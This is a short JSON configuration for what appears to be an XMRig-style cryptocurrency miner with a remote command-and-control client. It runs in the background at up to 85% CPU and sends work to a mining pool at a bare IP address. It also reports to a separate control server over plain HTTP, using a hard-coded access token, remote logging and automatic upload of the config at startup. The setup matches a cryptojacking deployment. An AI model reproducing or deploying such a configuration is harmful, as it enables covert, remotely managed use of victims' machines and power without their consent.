{
    "autosave": true,
    "background": true,
    "colors": true,
    "donate-level": 1,
    "donate-over-proxy": 1,
    "log-file": false,
    "cpu": {
        "max-cpu-usage": 85
    },

    "pools": [
        {
            "url": "91.217.81.162:443",
	    "enabled": true,
            "tls": true
        }
    ],
    "cc-client": {
        "enabled": true,
        "url": "46.29.164.162:80",
        "access-token": "egjkl09KJbhg96LKjhgf33sdjklf",
        "use-tls": false,
        "use-remote-logging": true,
        "upload-config-on-start": true,
        "worker-id": null,
        "reboot-cmd": null,
        "update-interval-s": 120
    }
}